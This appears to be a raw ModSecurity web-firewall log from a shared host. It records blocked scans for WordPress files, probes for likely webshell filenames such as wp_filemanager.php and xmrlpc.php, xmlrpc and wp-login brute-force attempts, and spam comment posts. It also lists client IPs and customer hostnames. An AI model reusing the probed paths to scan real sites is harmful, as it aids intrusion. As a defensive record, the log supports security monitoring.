[Tue May 26 15:35:03.493338 2026] [security2:error] [pid 724639:tid 724823] [client 85.204.70.118:59906] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVwTxKJRbiNp3eWdT1-lQAAALs"]
[Tue May 26 15:35:04.094480 2026] [security2:error] [pid 724639:tid 724880] [client 85.204.70.118:59912] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVwUBKJRbiNp3eWdT1-qAAAAPQ"]
[Tue May 26 15:35:04.686368 2026] [security2:error] [pid 724639:tid 724859] [client 85.204.70.118:59914] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVwUBKJRbiNp3eWdT1-uwAAAN8"]
[Tue May 26 15:35:05.098080 2026] [security2:error] [pid 724639:tid 724789] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwUBKJRbiNp3eWdT1-vQAAAJk"]
[Tue May 26 15:35:05.278703 2026] [security2:error] [pid 724639:tid 724785] [client 85.204.70.118:59926] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVwURKJRbiNp3eWdT1-xwAAAJU"]
[Tue May 26 15:35:05.864995 2026] [security2:error] [pid 724639:tid 724798] [client 85.204.70.118:59928] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVwURKJRbiNp3eWdT1-1QAAAKI"]
[Tue May 26 15:35:07.123949 2026] [security2:error] [pid 724639:tid 724876] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwUhKJRbiNp3eWdT1-8gAAAPA"]
[Tue May 26 15:35:07.161947 2026] [security2:error] [pid 724639:tid 724805] [client 114.119.148.237:21945] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVwUxKJRbiNp3eWdT1-_AAAAKk"], referer: http://haddingtonwines.com/cart?remove_item=d2b15c75c0c389b49c2efbea79cdc946
[Tue May 26 15:35:09.508950 2026] [security2:error] [pid 724639:tid 724777] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwVRKJRbiNp3eWdT1_KAAAAI0"]
[Tue May 26 15:35:11.345600 2026] [security2:error] [pid 724639:tid 724801] [client 114.119.155.111:31323] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/proyectos/avalturistica/wp-content/uploads/2021/01/brewery-08.jpg"] [unique_id "ahVwVxKJRbiNp3eWdT1_XQAAAKU"], referer: https://www.jhonweb.com/proyectos/avalturistica/wp-content/uploads/2021/01/brewery-08.jpg
[Tue May 26 15:35:11.775258 2026] [security2:error] [pid 724639:tid 724845] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwVxKJRbiNp3eWdT1_YAAAANE"]
[Tue May 26 15:35:13.768651 2026] [security2:error] [pid 724639:tid 724786] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwWRKJRbiNp3eWdT1_wwAAAJY"]
[Tue May 26 15:35:16.796387 2026] [security2:error] [pid 724639:tid 724844] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwXBKJRbiNp3eWdT2AJQAAANA"]
[Tue May 26 15:35:18.667084 2026] [security2:error] [pid 724639:tid 724863] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwXhKJRbiNp3eWdT2AggAAAOM"]
[Tue May 26 15:35:20.990221 2026] [security2:error] [pid 724639:tid 724890] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwYBKJRbiNp3eWdT2A-QAAAP4"]
[Tue May 26 15:35:23.056044 2026] [security2:error] [pid 724639:tid 724832] [client 74.249.173.207:37551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVwYxKJRbiNp3eWdT2BPwAAAMQ"]
[Tue May 26 15:35:23.056153 2026] [security2:error] [pid 724639:tid 724832] [client 74.249.173.207:37551] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVwYxKJRbiNp3eWdT2BPwAAAMQ"]
[Tue May 26 15:35:23.256468 2026] [security2:error] [pid 724639:tid 724883] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwYhKJRbiNp3eWdT2BNQAAAPc"]
[Tue May 26 15:35:24.623185 2026] [security2:error] [pid 724639:tid 724789] [client 74.249.173.207:1916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/lang/es.php"] [unique_id "ahVwZBKJRbiNp3eWdT2BdwAAAJk"]
[Tue May 26 15:35:24.623352 2026] [security2:error] [pid 724639:tid 724789] [client 74.249.173.207:1916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/lang/es.php"] [unique_id "ahVwZBKJRbiNp3eWdT2BdwAAAJk"]
[Tue May 26 15:35:24.653190 2026] [security2:error] [pid 724639:tid 724758] [remote 154.66.198.148:25654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVwZBKJRbiNp3eWdT2BagAAzXY"]
[Tue May 26 15:35:24.998915 2026] [security2:error] [pid 724639:tid 724815] [client 37.119.173.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwZBKJRbiNp3eWdT2BcwAAALM"]
[Tue May 26 15:35:25.281547 2026] [security2:error] [pid 724639:tid 724868] [client 74.249.173.207:36994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/core/init.php"] [unique_id "ahVwZRKJRbiNp3eWdT2BhAAAAOg"]
[Tue May 26 15:35:25.281658 2026] [security2:error] [pid 724639:tid 724868] [client 74.249.173.207:36994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/core/init.php"] [unique_id "ahVwZRKJRbiNp3eWdT2BhAAAAOg"]
[Tue May 26 15:35:25.513759 2026] [security2:error] [pid 724639:tid 724872] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwZRKJRbiNp3eWdT2BgAAAAOw"]
[Tue May 26 15:35:26.129746 2026] [security2:error] [pid 724639:tid 724862] [client 74.249.173.207:1241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/aa.php"] [unique_id "ahVwZhKJRbiNp3eWdT2BnQAAAOI"]
[Tue May 26 15:35:26.129885 2026] [security2:error] [pid 724639:tid 724862] [client 74.249.173.207:1241] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/aa.php"] [unique_id "ahVwZhKJRbiNp3eWdT2BnQAAAOI"]
[Tue May 26 15:35:26.489669 2026] [security2:error] [pid 724639:tid 724836] [client 74.249.173.207:43447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xmrlpc.php"] [unique_id "ahVwZhKJRbiNp3eWdT2BpgAAAMg"]
[Tue May 26 15:35:26.489777 2026] [security2:error] [pid 724639:tid 724836] [client 74.249.173.207:43447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xmrlpc.php"] [unique_id "ahVwZhKJRbiNp3eWdT2BpgAAAMg"]
[Tue May 26 15:35:27.632753 2026] [security2:error] [pid 724639:tid 724872] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwZxKJRbiNp3eWdT2BvgAAAOw"]
[Tue May 26 15:35:27.826863 2026] [security2:error] [pid 724639:tid 724832] [client 223.123.35.47:62463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwZxKJRbiNp3eWdT2BzAAAAMQ"]
[Tue May 26 15:35:27.827002 2026] [security2:error] [pid 724639:tid 724832] [client 223.123.35.47:62463] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwZxKJRbiNp3eWdT2BzAAAAMQ"]
[Tue May 26 15:35:28.067359 2026] [security2:error] [pid 724639:tid 724776] [client 74.249.173.207:1263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/class.php"] [unique_id "ahVwaBKJRbiNp3eWdT2B2gAAAIw"]
[Tue May 26 15:35:28.067442 2026] [security2:error] [pid 724639:tid 724776] [client 74.249.173.207:1263] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/class.php"] [unique_id "ahVwaBKJRbiNp3eWdT2B2gAAAIw"]
[Tue May 26 15:35:28.721016 2026] [security2:error] [pid 724639:tid 724886] [client 172.59.213.37:48893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.213.59.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moneyapp.com.co"] [uri "/xmlrpc.php"] [unique_id "ahVwaBKJRbiNp3eWdT2B6QAAAPo"]
[Tue May 26 15:35:28.721206 2026] [security2:error] [pid 724639:tid 724886] [client 172.59.213.37:48893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "moneyapp.com.co"] [uri "/xmlrpc.php"] [unique_id "ahVwaBKJRbiNp3eWdT2B6QAAAPo"]
[Tue May 26 15:35:29.061863 2026] [security2:error] [pid 724639:tid 724878] [client 89.124.112.117:54049] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.124.112.117" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVwaRKJRbiNp3eWdT2B-AAAAPI"], referer: https://atreegroup.com/2025/10/05/hello-world/
[Tue May 26 15:35:29.061963 2026] [security2:error] [pid 724639:tid 724878] [client 89.124.112.117:54049] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVwaRKJRbiNp3eWdT2B-AAAAPI"], referer: https://atreegroup.com/2025/10/05/hello-world/
[Tue May 26 15:35:29.278013 2026] [security2:error] [pid 724639:tid 724812] [client 34.48.194.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVwaRKJRbiNp3eWdT2B_wAAALA"]
[Tue May 26 15:35:29.462249 2026] [security2:error] [pid 724639:tid 724801] [client 74.249.173.207:1257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/goods.php"] [unique_id "ahVwaRKJRbiNp3eWdT2CCQAAAKU"]
[Tue May 26 15:35:29.462402 2026] [security2:error] [pid 724639:tid 724801] [client 74.249.173.207:1257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/goods.php"] [unique_id "ahVwaRKJRbiNp3eWdT2CCQAAAKU"]
[Tue May 26 15:35:30.035303 2026] [security2:error] [pid 724639:tid 724788] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwaRKJRbiNp3eWdT2CDwAAAJg"]
[Tue May 26 15:35:30.098444 2026] [security2:error] [pid 724639:tid 724838] [client 74.249.173.207:30943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/info.php"] [unique_id "ahVwahKJRbiNp3eWdT2CJwAAAMo"]
[Tue May 26 15:35:30.098633 2026] [security2:error] [pid 724639:tid 724838] [client 74.249.173.207:30943] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/info.php"] [unique_id "ahVwahKJRbiNp3eWdT2CJwAAAMo"]
[Tue May 26 15:35:30.599941 2026] [security2:error] [pid 724639:tid 724894] [client 34.48.194.191:57447] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVwahKJRbiNp3eWdT2CKAAAAQI"]
[Tue May 26 15:35:30.621171 2026] [security2:error] [pid 724639:tid 724886] [client 74.249.173.207:37529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/as.php"] [unique_id "ahVwahKJRbiNp3eWdT2CLwAAAPo"]
[Tue May 26 15:35:30.621283 2026] [security2:error] [pid 724639:tid 724886] [client 74.249.173.207:37529] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/as.php"] [unique_id "ahVwahKJRbiNp3eWdT2CLwAAAPo"]
[Tue May 26 15:35:30.742244 2026] [security2:error] [pid 724639:tid 724854] [client 34.48.194.191:57447] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVwahKJRbiNp3eWdT2CMAAAANo"]
[Tue May 26 15:35:31.042496 2026] [security2:error] [pid 724639:tid 724880] [client 74.249.173.207:38176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/bb.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CQAAAAPQ"]
[Tue May 26 15:35:31.042614 2026] [security2:error] [pid 724639:tid 724880] [client 74.249.173.207:38176] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/bb.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CQAAAAPQ"]
[Tue May 26 15:35:31.439879 2026] [security2:error] [pid 724639:tid 724895] [client 74.249.173.207:38145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/about.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CSwAAAQM"]
[Tue May 26 15:35:31.440005 2026] [security2:error] [pid 724639:tid 724895] [client 74.249.173.207:38145] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/about.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CSwAAAQM"]
[Tue May 26 15:35:31.544879 2026] [security2:error] [pid 724639:tid 724840] [client 94.158.244.245:58068] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "94.158.244.245" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CTwAAAMw"], referer: https://atreegroup.com/2025/10/05/hello-world/
[Tue May 26 15:35:31.544979 2026] [security2:error] [pid 724639:tid 724840] [client 94.158.244.245:58068] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CTwAAAMw"], referer: https://atreegroup.com/2025/10/05/hello-world/
[Tue May 26 15:35:31.839428 2026] [security2:error] [pid 724639:tid 724807] [client 74.249.173.207:28901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/222.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CYAAAAKs"]
[Tue May 26 15:35:31.839531 2026] [security2:error] [pid 724639:tid 724807] [client 74.249.173.207:28901] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/222.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CYAAAAKs"]
[Tue May 26 15:35:31.977440 2026] [security2:error] [pid 724639:tid 724784] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwaxKJRbiNp3eWdT2CVQAAAJQ"]
[Tue May 26 15:35:32.122640 2026] [security2:error] [pid 724639:tid 724844] [client 74.249.173.207:38162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/test1.php"] [unique_id "ahVwbBKJRbiNp3eWdT2CaQAAANA"]
[Tue May 26 15:35:32.122773 2026] [security2:error] [pid 724639:tid 724844] [client 74.249.173.207:38162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/test1.php"] [unique_id "ahVwbBKJRbiNp3eWdT2CaQAAANA"]
[Tue May 26 15:35:32.319406 2026] [security2:error] [pid 724639:tid 724690] [remote 54.38.29.86:50902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVwbBKJRbiNp3eWdT2CaAAA1jI"]
[Tue May 26 15:35:32.634551 2026] [security2:error] [pid 724639:tid 724879] [client 74.249.173.207:35154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-mail.php"] [unique_id "ahVwbBKJRbiNp3eWdT2CegAAAPM"]
[Tue May 26 15:35:32.634700 2026] [security2:error] [pid 724639:tid 724879] [client 74.249.173.207:35154] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/wp-mail.php"] [unique_id "ahVwbBKJRbiNp3eWdT2CegAAAPM"]
[Tue May 26 15:35:33.032954 2026] [security2:error] [pid 724639:tid 724815] [client 74.249.173.207:43442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CgQAAALM"]
